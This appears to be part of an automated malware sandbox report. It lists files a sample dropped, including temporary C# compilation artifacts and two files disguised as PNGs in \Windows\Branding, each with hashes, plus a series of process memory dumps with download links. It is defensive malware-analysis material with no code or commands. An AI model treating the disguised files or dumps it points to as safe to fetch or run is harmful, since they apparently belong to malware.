\??\c:\Users\Admin\AppData\Local\Temp\CSCB635.tmp

Filesize
652B

MD5
56c543492d7d18434196c390e0986107

SHA1
2d4a5a45f9253a1ccbadacfd90ffbe873501cd49

SHA256
c1a12f6aabd2070ac07af877ea019691af8c06056fe74daa08895bb28b3a694d

SHA512
a55c4e0403818a9a563701232885f628431b64029e17f530dacda2ad5e33f9d16a6f4e93454148c09c46a180bb1030d53f41a062bccc87c6fb3b893a69e40817

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zykyxe9e.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zykyxe9e.cmdline

Filesize
309B

MD5
37efd3139d0e81d2c5fe532e898330d5

SHA1
85c667a90a7b8e3aee2271acf0a8f1f0ac426bde

SHA256
14b9ab3101f150037f400a34bd0c87d982b5b523da42d7e46c185484d4e9025d

SHA512
14daa76abd800c6ca8dc7f9694dea31e72b738adfc0ef4bc085126a299bcea330e7d4abbc48ed16e866b7a45f579294b175e577e9a40bbf0dcd312f01561f614

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
f90a95e65ea4b8785701c5016a5319e3

SHA1
998ff9ca14eecdee37352a362c5929e6ecadf543

SHA256
83e90a20670525dcd14b387165d04c86fd88719b9aa55936318cb5c2a30ef003

SHA512
2ffb491306538032143623a4ea38d0adbe031550ae9e3e973d5e7b48c5737aecab4b92f9d3e50c07e1b70f0e3e1a3b8bc499c6c8d4ff1984ba3971357e1c8578

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
c88ee22ef943b6984da0a92dcbdbb512

SHA1
fe6be3ebdc42c32d5a5842fd34d61c6b217e7454

SHA256
8697ec4ec5cde1fea30fe0f5ccd3e97ef9fafbb392ac0b4404d012a4fc1afa1d

SHA512
108ffb89411d1c0db5ef90d056d91187771ec0103adaa4a97904cb4fd25473208dd4fddc0f6cbba646f21a5d164a5a93c80c989211ceabed863196a4afc319c6

Download Submit
memory/1804-30-0x0000000002E90000-0x0000000002E98000-memory.dmp

Filesize
32KB

Download
memory/1804-54-0x000007FEED9F0000-0x000007FEEE38D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-18-0x000007FEED9F0000-0x000007FEEE38D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-59-0x000007FEED9F0000-0x000007FEEE38D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-13-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/1804-12-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/1804-34-0x000000001B640000-0x000000001B672000-memory.dmp

Filesize
200KB

Download
memory/1804-35-0x000000001B640000-0x000000001B672000-memory.dmp

Filesize
200KB

Download
memory/1804-11-0x000007FEEDCAE000-0x000007FEEDCAF000-memory.dmp

Filesize
4KB

Download
memory/1804-57-0x000007FEED9F0000-0x000007FEEE38D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-58-0x000007FEED9F0000-0x000007FEEE38D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-21-0x000007FEED9F0000-0x000007FEEE38D000-memory.dmp

Filesize
9.6MB

Download
memory/1804-55-0x000007FEEDCAE000-0x000007FEEDCAF000-memory.dmp

Filesize
4KB

Download
memory/1804-56-0x000007FEED9F0000-0x000007FEEE38D000-memory.dmp

Filesize
9.6MB

Download
memory/2156-52-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp

Filesize
4KB

Download
memory/2156-51-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Filesize
9.9MB

Download
memory/2156-0-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp

Filesize
4KB

Download
memory/2156-4-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Filesize
9.9MB

Download
memory/2156-3-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Filesize
9.9MB

Download
memory/2156-2-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

Filesize
9.9MB

Download
memory/2156-1-0x0000000041A40000-0x0000000041E66000-memory.dmp

Filesize
4.1MB

Download